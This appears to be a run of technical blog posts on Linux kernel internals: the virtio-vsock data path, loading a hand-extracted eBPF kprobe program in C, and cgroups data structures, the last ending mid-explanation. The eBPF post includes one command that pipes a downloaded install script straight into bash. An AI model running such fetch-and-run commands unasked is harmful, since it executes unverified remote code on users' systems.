<p>‘virtio_transport_alloc_pkt’ allocates a buffer (‘pkt->buf’) to store the data to send.
‘virtio_transport_send_pkt’ inserts the ‘virtio_vsock_pkt’ into a list and queues a work item.
The actual data send happens in the ‘virtio_transport_send_pkt_work’ function.</p>
<p>‘virtio_transport_send_pkt_work’ performs the standard virtio driver operations: prepare a scatterlist from the msg header and the msg itself, call ‘virtqueue_add_sgs’, then call ‘virtqueue_kick’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void
virtio_transport_send_pkt_work(struct work_struct *work)
{
struct virtio_vsock *vsock =
container_of(work, struct virtio_vsock, send_pkt_work);
struct virtqueue *vq;
bool added = false;
bool restart_rx = false;
mutex_lock(&vsock->tx_lock);
...
vq = vsock->vqs[VSOCK_VQ_TX];
for (;;) {
struct virtio_vsock_pkt *pkt;
struct scatterlist hdr, buf, *sgs[2];
int ret, in_sg = 0, out_sg = 0;
bool reply;
...
pkt = list_first_entry(&vsock->send_pkt_list,
struct virtio_vsock_pkt, list);
list_del_init(&pkt->list);
spin_unlock_bh(&vsock->send_pkt_list_lock);
virtio_transport_deliver_tap_pkt(pkt);
reply = pkt->reply;
sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
sgs[out_sg++] = &hdr;
if (pkt->buf) {
sg_init_one(&buf, pkt->buf, pkt->len);
sgs[out_sg++] = &buf;
}
ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, pkt, GFP_KERNEL);
/* Usually this means that there is no more space available in
* the vq
*/
...
added = true;
}
if (added)
virtqueue_kick(vq);
...
}
</code></pre></div></div>
<h4> host recv </h4>
<p>The host side’s handler for the tx queue kick is ‘vhost_vsock_handle_tx_kick’; it is set up in the ‘vhost_vsock_dev_open’ function.</p>
<p>‘vhost_vsock_handle_tx_kick’ performs the standard virtio backend operations: pop the vring descriptors, call ‘vhost_vsock_alloc_pkt’ to reconstruct a ‘virtio_vsock_pkt’, then call ‘virtio_transport_recv_pkt’ to deliver the packet to its destination.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
{
struct vhost_virtqueue *vq = container_of(work, struct vhost_virtqueue,
poll.work);
struct vhost_vsock *vsock = container_of(vq->dev, struct vhost_vsock,
dev);
struct virtio_vsock_pkt *pkt;
int head, pkts = 0, total_len = 0;
unsigned int out, in;
bool added = false;
mutex_lock(&vq->mutex);
...
vhost_disable_notify(&vsock->dev, vq);
do {
u32 len;
...
head = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
&out, &in, NULL, NULL);
...
pkt = vhost_vsock_alloc_pkt(vq, out, in);
...
len = pkt->len;
/* Deliver to monitoring devices all received packets */
virtio_transport_deliver_tap_pkt(pkt);
/* Only accept correctly addressed packets */
if (le64_to_cpu(pkt->hdr.src_cid) == vsock->guest_cid)
virtio_transport_recv_pkt(pkt);
else
virtio_transport_free_pkt(pkt);
len += sizeof(pkt->hdr);
vhost_add_used(vq, head, len);
total_len += len;
added = true;
} while(likely(!vhost_exceeds_weight(vq, ++pkts, total_len)));
...
}
</code></pre></div></div>
<p>‘virtio_transport_recv_pkt’ is the function that actually delivers the msg data. It calls ‘vsock_find_connected_socket’ to find the destination socket, then calls a specific function according to the destination socket’s state. For ‘TCP_ESTABLISHED’ it calls ‘virtio_transport_recv_connected’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void virtio_transport_recv_pkt(struct virtio_vsock_pkt *pkt)
{
struct sockaddr_vm src, dst;
struct vsock_sock *vsk;
struct sock *sk;
bool space_available;
vsock_addr_init(&src, le64_to_cpu(pkt->hdr.src_cid),
le32_to_cpu(pkt->hdr.src_port));
vsock_addr_init(&dst, le64_to_cpu(pkt->hdr.dst_cid),
le32_to_cpu(pkt->hdr.dst_port));
...
/* The socket must be in connected or bound table
* otherwise send reset back
*/
sk = vsock_find_connected_socket(&src, &dst);
...
vsk = vsock_sk(sk);
...
switch (sk->sk_state) {
case TCP_LISTEN:
virtio_transport_recv_listen(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
case TCP_SYN_SENT:
virtio_transport_recv_connecting(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
case TCP_ESTABLISHED:
virtio_transport_recv_connected(sk, pkt);
break;
case TCP_CLOSING:
virtio_transport_recv_disconnecting(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
default:
virtio_transport_free_pkt(pkt);
break;
}
release_sock(sk);
/* Release refcnt obtained when we fetched this socket out of the
* bound or connected list.
*/
sock_put(sk);
return;
free_pkt:
virtio_transport_free_pkt(pkt);
}
</code></pre></div></div>
<p>For data packets the ‘pkt->hdr.op’ is ‘VIRTIO_VSOCK_OP_RW’, so ‘virtio_transport_recv_enqueue’ is called, which adds the packet to the destination socket’s ‘rx_queue’.</p>
<p>So when the host/other VM calls recv, ‘vsock_stream_recvmsg’ is called and the transport layer’s ‘stream_dequeue’ callback (virtio_transport_stream_do_dequeue) is invoked. virtio_transport_stream_do_dequeue pops entries from ‘rx_queue’, copies them into the msghdr and returns the data to the userspace application.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t
virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
struct msghdr *msg,
size_t len)
{
struct virtio_vsock_sock *vvs = vsk->trans;
struct virtio_vsock_pkt *pkt;
size_t bytes, total = 0;
u32 free_space;
int err = -EFAULT;
spin_lock_bh(&vvs->rx_lock);
while (total < len && !list_empty(&vvs->rx_queue)) {
pkt = list_first_entry(&vvs->rx_queue,
struct virtio_vsock_pkt, list);
bytes = len - total;
if (bytes > pkt->len - pkt->off)
bytes = pkt->len - pkt->off;
/* sk_lock is held by caller so no one else can dequeue.
* Unlock rx_lock since memcpy_to_msg() may sleep.
*/
spin_unlock_bh(&vvs->rx_lock);
err = memcpy_to_msg(msg, pkt->buf + pkt->off, bytes);
if (err)
goto out;
spin_lock_bh(&vvs->rx_lock);
total += bytes;
pkt->off += bytes;
if (pkt->off == pkt->len) {
virtio_transport_dec_rx_pkt(vvs, pkt);
list_del(&pkt->list);
virtio_transport_free_pkt(pkt);
}
}
...
return total;
...
}
</code></pre></div></div>
<h3> multi-transport </h3>
<p>As we can see from the above, one kernel (host or guest) can register only one transport. This is problematic in nested virtualization environments. For example, consider a host running an L0 VMware VM which in turn runs an L1 qemu/kvm VM. The L0 VM can register only one transport: if it registers the ‘vmci’ transport it can talk only to the VMware vmci device; if it registers ‘vhost_vsock’ it can talk only to the L1 VM.
Fortunately, Stefano Garzarella has addressed this issue in commit <a href="https://github.com/torvalds/linux/commit/c0cfa2d8a788fcf45df5bf4070ab2474c88d543a">vsock: add multi-transports support</a>. Those interested can learn more there.</p>
<h3> Reference </h3>
<ol>
<li><a href="https://vmsplice.net/~stefan/stefanha-kvm-forum-2015.pdf">virtio-vsock Zero-configuration host/guest communication</a>, Stefan Hajnoczi, KVM Forum 2015</li>
<li><a href="https://static.sched.com/hosted_files/devconfcz2020a/b1/DevConf.CZ_2020_vsock_v1.1.pdf">VSOCK: VM↔host socket with minimal configuration</a>, Stefano Garzarella, DevConf.CZ 2020</li>
<li><a href="https://stefano-garzarella.github.io/posts/2020-02-20-vsock-nested-vms-loopback/">AF_VSOCK: nested VMs and loopback support available</a></li>
</ol>
Write eBPF program in pure C2020-01-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/01/18/ebpf-in-c
<p>While developing a new eBPF program type, we need to do some small tests. We do not want to touch much of libbpf or the higher-level bcc; what we need is just an eBPF program and a way to load it into the kernel. This post shows how to do that: I will attach an eBPF program to a kprobe. This involves three parts: preparing the eBPF program, writing a loader for it, and opening the kernel function to kprobe.</p>
<h3> Prepare an eBPF program </h3>
<p>On Debian 9.1 we install a custom kernel (4.9.208). Go to samples/bpf and run make (you first need to install clang and llvm).</p>
<p>Add a test_bpf.c in the samples/bpf directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <uapi/linux/bpf.h>
#include "bpf_helpers.h"
int bpf_prog(void *ctx) {
char buf[] = "Hello World!\n";
bpf_trace_printk(buf, sizeof(buf));
return 0;
}
</code></pre></div></div>
<p>Add one line in the right place in samples/bpf/Makefile.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> always += test_bpf.o
</code></pre></div></div>
<p>Then type ‘make’ to compile this bpf program.</p>
<p>Now we get a ‘test_bpf.o’ file. But it contains a lot of ELF file metadata; we need to extract the eBPF program itself.</p>
<p>First let’s see what the eBPF code is. The first try shows that Debian’s built-in llvm tools are too old; they don’t support the ‘-S’ option.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump -arch-name=bpf -S test_bpf.o
llvm-objdump: Unknown command line argument '-S'. Try: 'llvm-objdump -help'
llvm-objdump: Did you mean '-D'?
</code></pre></div></div>
<p>Go to ‘http://apt.llvm.org/’ and install a newer clang and llvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bash -c "$(wget -O - https://apt.llvm.org/llvm.sh)"
</code></pre></div></div>
<p>Use the new tool to see the eBPF program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump-9 -arch-name=bpf -S test_bpf.o
test_bpf.o: file format ELF64-unknown
Disassembly of section .text:
0000000000000000 bpf_prog:
0: b7 01 00 00 0a 00 00 00 r1 = 10
1: 6b 1a fc ff 00 00 00 00 *(u16 *)(r10 - 4) = r1
2: b7 01 00 00 72 6c 64 21 r1 = 560229490
3: 63 1a f8 ff 00 00 00 00 *(u32 *)(r10 - 8) = r1
4: 18 01 00 00 48 65 6c 6c 00 00 00 00 6f 20 57 6f r1 = 8022916924116329800 ll
6: 7b 1a f0 ff 00 00 00 00 *(u64 *)(r10 - 16) = r1
7: bf a1 00 00 00 00 00 00 r1 = r10
8: 07 01 00 00 f0 ff ff ff r1 += -16
9: b7 02 00 00 0e 00 00 00 r2 = 14
10: 85 00 00 00 06 00 00 00 call 6
11: b7 00 00 00 00 00 00 00 r0 = 0
12: 95 00 00 00 00 00 00 00 exit
root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf#
</code></pre></div></div>
<p>As we can see, the eBPF code is contained in the .text section of ‘test_bpf.o’; its size is 13*8=104 bytes.</p>
<p>Use dd to dump the eBPF code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# dd if=./test_bpf.o of=test_bpf bs=1 count=104 skip=64
104+0 records in
104+0 records out
104 bytes copied, 0.000221178 s, 470 kB/s
root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# hexdump test_bpf
0000000 01b7 0000 000a 0000 1a6b fffc 0000 0000
0000010 01b7 0000 6c72 2164 1a63 fff8 0000 0000
0000020 0118 0000 6548 6c6c 0000 0000 206f 6f57
0000030 1a7b fff0 0000 0000 a1bf 0000 0000 0000
0000040 0107 0000 fff0 ffff 02b7 0000 000e 0000
0000050 0085 0000 0006 0000 00b7 0000 0000 0000
0000060 0095 0000 0000 0000
0000068
</code></pre></div></div>
<p>OK, now we have our eBPF program in ‘test_bpf’: the raw instructions of a ‘Hello World’ eBPF program.</p>
<h3> Open the perf event kprobe </h3>
<p>Create the kprobe and get its event id:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208# echo 'p:sys_clone sys_clone' >> /sys/kernel/debug/tracing/kprobe_events
root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/events/kprobes/sys_clone/id
1254
</code></pre></div></div>
<h3> Write a loader </h3>
<p>The source code of loader is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <linux/version.h>
#include <linux/perf_event.h>
#include <linux/hw_breakpoint.h>
#include <errno.h>
int main()
{
int bfd;
unsigned char buf[1024] = {};
struct bpf_insn *insn;
union bpf_attr attr = {};
unsigned char log_buf[4096] = {};
int ret;
int efd;
int pfd;
int n;
int i;
struct perf_event_attr pattr = {};
bfd = open("./test_bpf", O_RDONLY);
if (bfd < 0)
{
printf("open eBPF program error: %s\n", strerror(errno));
exit(-1);
}
n = read(bfd, buf, 1024);
for (i = 0; i < n; ++i)
{
printf("%02x ", buf[i]);
if (i % 8 == 0)
printf("\n");
}
close(bfd);
insn = (struct bpf_insn*)buf;
attr.prog_type = BPF_PROG_TYPE_KPROBE;
attr.insns = (unsigned long)insn;
attr.insn_cnt = n / sizeof(struct bpf_insn);
attr.license = (unsigned long)"GPL";
attr.log_size = sizeof(log_buf);
attr.log_buf = (unsigned long)log_buf;
attr.log_level = 1;
attr.kern_version = 264656;
pfd = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
if (pfd < 0)
{
printf("bpf syscall error: %s\n", strerror(errno));
printf("log_buf = %s\n", log_buf);
exit(-1);
}
pattr.type = PERF_TYPE_TRACEPOINT;
pattr.sample_type = PERF_SAMPLE_RAW;
pattr.sample_period = 1;
pattr.wakeup_events = 1;
pattr.config = 1254;
pattr.size = sizeof(pattr);
efd = syscall(SYS_perf_event_open, &pattr, -1, 0, -1, 0);
if (efd < 0)
{
printf("perf_event_open error: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(efd, PERF_EVENT_IOC_ENABLE, 0);
if (ret < 0)
{
printf("PERF_EVENT_IOC_ENABLE error: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(efd, PERF_EVENT_IOC_SET_BPF, pfd);
if (ret < 0)
{
printf("PERF_EVENT_IOC_SET_BPF error: %s\n", strerror(errno));
exit(-1);
}
while(1);
}
</code></pre></div></div>
<p>Some things to notice:</p>
<ol>
<li>
<p>I first used the eBPF program as ‘BPF_PROG_TYPE_TRACEPOINT’ and attached it to the syscalls tracepoints. But it didn’t work, and I was quite confused about this until I read
https://github.com/iovisor/bcc/issues/748 . So I switched to using a kprobe.</p>
</li>
<li>
<p>The ‘attr.kern_version’ value is ‘LINUX_VERSION_CODE’, read from the linux-4.9.208/usr/include/linux/version.h file.</p>
</li>
<li>
<p>The final ‘while’ loop keeps the process alive so the eBPF program stays loaded. There are proper ways to pin a program; I use ‘while’ to keep things simple.</p>
</li>
</ol>
<p>Before we execute the ‘test_loader’, we first read ‘/sys/kernel/debug/tracing/trace_pipe’ in Terminal 1; this is where the ‘bpf_trace_printk’ output goes.</p>
<p>Then run the ‘test_loader’ in Terminal 2, and we can see the output in Terminal 1 as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208# cat /sys/kernel/debug/tracing/trace_pipe
bash-13708 [003] d... 51890.256702: : Hello World!
bash-13708 [001] d... 51905.890740: : Hello World!
bash-13708 [000] d... 52578.776651: : Hello World!
gnome-shell-1429 [000] d... 52581.579554: : Hello World!
gnome-shell-1429 [001] d... 52582.922830: : Hello World!
gnome-shell-13773 [000] d... 52582.937085: : Hello World!
</code></pre></div></div>
cgroups internals2020-01-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/01/05/cgroup-internlas
<h3> Concepts </h3>
<p>Control groups provide a mechanism to group processes/tasks in order to control their behaviour (for example, to limit resources). Some of the concepts:</p>
<p>cgroup: a set of tasks with a set of parameters for one or more subsystems.</p>
<p>subsystem: a resource controller that schedules a resource or applies per-cgroup limits.</p>
<p>hierarchy: a set of cgroups arranged in a tree. Every task in the system is in exactly one of the cgroups in the hierarchy and a set of subsystems.</p>
<p>Cgroups are the fundamental mechanism underlying Docker. This post digs into how cgroups are implemented, using kernel 4.4.</p>
<h3> Basic structure </h3>
<p>task_struct has a ‘cgroups’ field which points to a ‘struct css_set’; this contains the process’s cgroups info.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct css_set {
/* Reference count */
atomic_t refcount;
/*
* List running through all cgroup groups in the same hash
* slot. Protected by css_set_lock
*/
struct hlist_node hlist;
/*
* Lists running through all tasks using this cgroup group.
* mg_tasks lists tasks which belong to this cset but are in the
* process of being migrated out or in. Protected by
* css_set_rwsem, but, during migration, once tasks are moved to
* mg_tasks, it can be read safely while holding cgroup_mutex.
*/
struct list_head tasks;
struct list_head mg_tasks;
/*
* List of cgrp_cset_links pointing at cgroups referenced from this
* css_set. Protected by css_set_lock.
*/
struct list_head cgrp_links;
/* the default cgroup associated with this css_set */
struct cgroup *dfl_cgrp;
/*
* Set of subsystem states, one for each subsystem. This array is
* immutable after creation apart from the init_css_set during
* subsystem registration (at boot time).
*/
struct cgroup_subsys_state *subsys[CGROUP_SUBSYS_COUNT];
/*
* List of csets participating in the on-going migration either as
* source or destination. Protected by cgroup_mutex.
*/
struct list_head mg_preload_node;
struct list_head mg_node;
/*
* If this cset is acting as the source of migration the following
* two fields are set. mg_src_cgrp is the source cgroup of the
* on-going migration and mg_dst_cset is the destination cset the
* target tasks on this cset should be migrated to. Protected by
* cgroup_mutex.
*/
struct cgroup *mg_src_cgrp;
struct css_set *mg_dst_cset;
/*
* On the default hierarhcy, ->subsys[ssid] may point to a css
* attached to an ancestor instead of the cgroup this css_set is
* associated with. The following node is anchored at
* ->subsys[ssid]->cgroup->e_csets[ssid] and provides a way to
* iterate through all css's attached to a given cgroup.
*/
struct list_head e_cset_node[CGROUP_SUBSYS_COUNT];
/* all css_task_iters currently walking this cset */
struct list_head task_iters;
/* dead and being drained, ignore for migration */
bool dead;
/* For RCU-protected deletion */
struct rcu_head rcu_head;
};
</code></pre></div></div>
<p>The ‘mg_*’ fields are used to migrate a process from one group to another.
‘hlist’ links all the ‘css_set’s that fall into the same hash table slot.
‘tasks’ links all the processes using this ‘css_set’.
‘cgrp_links’ links to ‘cgrp_cset_link’ structures, which connect a ‘css_set’ with a ‘cgroup’.
‘subsys’ is an array of pointers to ‘cgroup_subsys_state’. A ‘cgroup_subsys_state’ is a subsystem-specific control structure.</p>
<p>‘cgroup_subsys_state’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgroup_subsys_state {
/* PI: the cgroup that this css is attached to */
struct cgroup *cgroup;
/* PI: the cgroup subsystem that this css is attached to */
struct cgroup_subsys *ss;
/* reference count - access via css_[try]get() and css_put() */
struct percpu_ref refcnt;
/* PI: the parent css */
struct cgroup_subsys_state *parent;
/* siblings list anchored at the parent's ->children */
struct list_head sibling;
struct list_head children;
/*
* PI: Subsys-unique ID. 0 is unused and root is always 1. The
* matching css can be looked up using css_from_id().
*/
int id;
unsigned int flags;
/*
* Monotonically increasing unique serial number which defines a
* uniform order among all csses. It's guaranteed that all
* ->children lists are in the ascending order of ->serial_nr and
* used to allow interrupting and resuming iterations.
*/
u64 serial_nr;
/*
* Incremented by online self and children. Used to guarantee that
* parents are not offlined before their children.
*/
atomic_t online_cnt;
/* percpu_ref killing and RCU release */
struct rcu_head rcu_head;
struct work_struct destroy_work;
};
</code></pre></div></div>
<p>The ‘struct cgroup’ member represents the ‘cgroup’ that the process is attached to.
The ‘cgroup_subsys’ member points to a specific subsystem.</p>
<p>In fact ‘cgroup_subsys_state’ is embedded in a subsystem-specific cgroup structure. For example, the memory controller ‘mem_cgroup’ has the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct mem_cgroup {
struct cgroup_subsys_state css;
/* Private memcg ID. Used to ID objects that outlive the cgroup */
struct mem_cgroup_id id;
/* Accounted resources */
struct page_counter memory;
struct page_counter memsw;
struct page_counter kmem;
...
}
</code></pre></div></div>
<p>The ‘css_set’s subsys member points to the ‘mem_cgroup’s ‘css’ field.</p>
<p>Following is the definition of ‘struct cgroup’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgroup {
/* self css with NULL ->ss, points back to this cgroup */
struct cgroup_subsys_state self;
unsigned long flags; /* "unsigned long" so bitops work */
/*
* idr allocated in-hierarchy ID.
*
* ID 0 is not used, the ID of the root cgroup is always 1, and a
* new cgroup will be assigned with a smallest available ID.
*
* Allocating/Removing ID must be protected by cgroup_mutex.
*/
int id;
/*
* Each non-empty css_set associated with this cgroup contributes
* one to populated_cnt. All children with non-zero popuplated_cnt
* of their own contribute one. The count is zero iff there's no
* task in this cgroup or its subtree.
*/
int populated_cnt;
struct kernfs_node *kn; /* cgroup kernfs entry */
struct cgroup_file procs_file; /* handle for "cgroup.procs" */
struct cgroup_file events_file; /* handle for "cgroup.events" */
/*
* The bitmask of subsystems enabled on the child cgroups.
* ->subtree_control is the one configured through
* "cgroup.subtree_control" while ->child_subsys_mask is the
* effective one which may have more subsystems enabled.
* Controller knobs are made available iff it's enabled in
* ->subtree_control.
*/
unsigned int subtree_control;
unsigned int child_subsys_mask;
/* Private pointers for each registered subsystem */
struct cgroup_subsys_state __rcu *subsys[CGROUP_SUBSYS_COUNT];
struct cgroup_root *root;
/*
* List of cgrp_cset_links pointing at css_sets with tasks in this
* cgroup. Protected by css_set_lock.
*/
struct list_head cset_links;
/*
* On the default hierarchy, a css_set for a cgroup with some
* susbsys disabled will point to css's which are associated with
* the closest ancestor which has the subsys enabled. The
* following lists all css_sets which point to this cgroup's css
* for the given subsystem.
*/
struct list_head e_csets[CGROUP_SUBSYS_COUNT];
/*
* list of pidlists, up to two for each namespace (one for procs, one
* for tasks); created on demand.
*/
struct list_head pidlists;
struct mutex pidlist_mutex;
/* used to wait for offlining of csses */
wait_queue_head_t offline_waitq;
/* used to schedule release agent */
struct work_struct release_agent_work;
};
</code></pre></div></div>
<p>‘struct cgroup’ represents a concrete control group.
‘kn’ is the cgroup kernfs entry.
‘subsys’ is an array of pointers to ‘cgroup_subsys_state’; these represent the subsystems this ‘cgroup’ contains.
‘cset_links’ is used to link to ‘cgrp_cset_link’.</p>
<p>A ‘css_set’ can be associated with multiple cgroups, and a ‘cgroup’ can be associated with multiple css_sets, as different tasks may belong to different cgroups on different hierarchies. This M:N relationship is represented by ‘struct cgrp_cset_link’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cgrp_cset_link {
/* the cgroup and css_set this link associates */
struct cgroup *cgrp;
struct css_set *cset;
/* list of cgrp_cset_links anchored at cgrp->cset_links */
struct list_head cset_link;
/* list of cgrp_cset_links anchored at css_set->cgrp_links */
struct list_head cgrp_link;
};
</code></pre></div></div>
<p>Following figures show the data relations:</p>
<p><img src="/assets/img/cgroups/1.png" alt="" /></p>
<h3> Cgroups initialization </h3>
<p>In an early stage of start_kernel, the kernel calls ‘cgroup_init_early’ to initialize the subsystems that need early initialization, as indicated by the early_init member of ‘struct cgroup_subsys’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int __init cgroup_init_early(void)
{
static struct cgroup_sb_opts __initdata opts;
struct cgroup_subsys *ss;
int i;
init_cgroup_root(&cgrp_dfl_root, &opts);
cgrp_dfl_root.cgrp.self.flags |= CSS_NO_REF;
RCU_INIT_POINTER(init_task.cgroups, &init_css_set);
for_each_subsys(ss, i) {
WARN(!ss->css_alloc || !ss->css_free || ss->name || ss->id,
"invalid cgroup_subsys %d:%s css_alloc=%p css_free=%p name:id=%d:%s\n",
i, cgroup_subsys_name[i], ss->css_alloc, ss->css_free,
ss->id, ss->name);
WARN(strlen(cgroup_subsys_name[i]) > MAX_CGROUP_TYPE_NAMELEN,
"cgroup_subsys_name %s too long\n", cgroup_subsys_name[i]);
ss->id = i;
ss->name = cgroup_subsys_name[i];
if (!ss->legacy_name)
ss->legacy_name = cgroup_subsys_name[i];
if (ss->early_init)
cgroup_init_subsys(ss, true);
}
return 0;
}
</code></pre></div></div>
<p>In ‘cgroup_init_early’, it first initializes ‘cgrp_dfl_root’, the default ‘cgroup_root’. This is reserved for the subsystems that are not used; it has a single cgroup, and all tasks are part of that cgroup. Then it sets ‘init_css_set’ as ‘init_task.cgroups’, so if we don’t use cgroups all processes will use this ‘init_css_set’ in their task_struct.cgroups. Finally it iterates over all subsystems and calls ‘cgroup_init_subsys’ to initialize those marked early_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
{
struct cgroup_subsys_state *css;
printk(KERN_INFO "Initializing cgroup subsys %s\n", ss->name);
mutex_lock(&cgroup_mutex);
idr_init(&ss->css_idr);
INIT_LIST_HEAD(&ss->cfts);
/* Create the root cgroup state for this subsystem */
ss->root = &cgrp_dfl_root;
css = ss->css_alloc(cgroup_css(&cgrp_dfl_root.cgrp, ss));
/* We don't handle early failures gracefully */
BUG_ON(IS_ERR(css));
init_and_link_css(css, ss, &cgrp_dfl_root.cgrp);
...
init_css_set.subsys[ss->id] = css;
...
BUG_ON(online_css(css));
mutex_unlock(&cgroup_mutex);
}
</code></pre></div></div>
<p>‘cgroup_init_subsys’ first sets the ‘cgroup_subsys’s root to the default cgroup_root, then calls the subsystem’s css_alloc callback to allocate a ‘struct cgroup_subsys_state’. The argument passed to css_alloc here is NULL, which lets the subsystem do special setup for this default cgroup_root. For example, the memory cgroup sets its memory limits to the maximum value.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct cgroup_subsys_state * __ref
mem_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
{
struct mem_cgroup *memcg;
long error = -ENOMEM;
int node;
memcg = mem_cgroup_alloc();
if (!memcg)
return ERR_PTR(error);
for_each_node(node)
if (alloc_mem_cgroup_per_zone_info(memcg, node))
goto free_out;
/* root ? */
if (parent_css == NULL) {
root_mem_cgroup = memcg;
mem_cgroup_root_css = &memcg->css;
page_counter_init(&memcg->memory, NULL);
memcg->high = PAGE_COUNTER_MAX;
memcg->soft_limit = PAGE_COUNTER_MAX;
page_counter_init(&memcg->memsw, NULL);
page_counter_init(&memcg->kmem, NULL);
}
...
}
</code></pre></div></div>
<p>After getting the ‘cgroup_subsys_state’, ‘cgroup_init_subsys’ calls ‘init_and_link_css’ to initialize it and ‘online_css’ to invoke the subsystem’s css_online callback.</p>
<p>The second stage of initialization, ‘cgroup_init’, does more work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int __init cgroup_init(void)
{
struct cgroup_subsys *ss;
unsigned long key;
int ssid;
BUG_ON(percpu_init_rwsem(&cgroup_threadgroup_rwsem));
BUG_ON(cgroup_init_cftypes(NULL, cgroup_dfl_base_files));
BUG_ON(cgroup_init_cftypes(NULL, cgroup_legacy_base_files));
mutex_lock(&cgroup_mutex);
/* Add init_css_set to the hash table */
key = css_set_hash(init_css_set.subsys);
hash_add(css_set_table, &init_css_set.hlist, key);
BUG_ON(cgroup_setup_root(&cgrp_dfl_root, 0));
mutex_unlock(&cgroup_mutex);
for_each_subsys(ss, ssid) {
if (ss->early_init) {
struct cgroup_subsys_state *css =
init_css_set.subsys[ss->id];
css->id = cgroup_idr_alloc(&ss->css_idr, css, 1, 2,
GFP_KERNEL);
BUG_ON(css->id < 0);
} else {
cgroup_init_subsys(ss, false);
}
list_add_tail(&init_css_set.e_cset_node[ssid],
&cgrp_dfl_root.cgrp.e_csets[ssid]);
...
cgrp_dfl_root.subsys_mask |= 1 << ss->id;
if (!ss->dfl_cftypes)
cgrp_dfl_root_inhibit_ss_mask |= 1 << ss->id;
if (ss->dfl_cftypes == ss->legacy_cftypes) {
WARN_ON(cgroup_add_cftypes(ss, ss->dfl_cftypes));
} else {
WARN_ON(cgroup_add_dfl_cftypes(ss, ss->dfl_cftypes));
WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
}
if (ss->bind)
ss->bind(init_css_set.subsys[ssid]);
}
WARN_ON(sysfs_create_mount_point(fs_kobj, "cgroup"));
WARN_ON(register_filesystem(&cgroup_fs_type));
WARN_ON(!proc_create("cgroups", 0, NULL, &proc_cgroupstats_operations));
return 0;
}
</code></pre></div></div>
<p>First it calls ‘cgroup_init_cftypes’ to initialize two ‘struct cftype’ arrays, ‘cgroup_dfl_base_files’ and ‘cgroup_legacy_base_files’. A ‘cftype’ describes a cgroup control file and its handlers. ‘cgroup_dfl_base_files’ is for the default hierarchy and ‘cgroup_legacy_base_files’ is for legacy hierarchies.
In practice we don’t see the cgroup_dfl_base_files files, as Linux distros mount the legacy hierarchies for management; after the system boots we see the cgroup_legacy_base_files files.</p>
<p>Then ‘cgroup_init’ calculates the hash key of ‘init_css_set.subsys’ and inserts it into css_set_table, which contains all of the ‘css_set’s.</p>
<p>‘cgroup_setup_root’ is used to set up a ‘cgroup_root’. This function is also called from cgroup_mount; the ‘ss_mask’ argument is the mask of subsystems.</p>
<p>‘allocate_cgrp_cset_links’ allocates ‘css_set_count’ ‘cgrp_cset_link’s. These links are later used to connect every existing ‘css_set’ to this new ‘cgroup_root’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> hash_for_each(css_set_table, i, cset, hlist) {
link_css_set(&tmp_links, cset, root_cgrp);
if (css_set_populated(cset))
cgroup_update_populated(root_cgrp, true);
}
</code></pre></div></div>
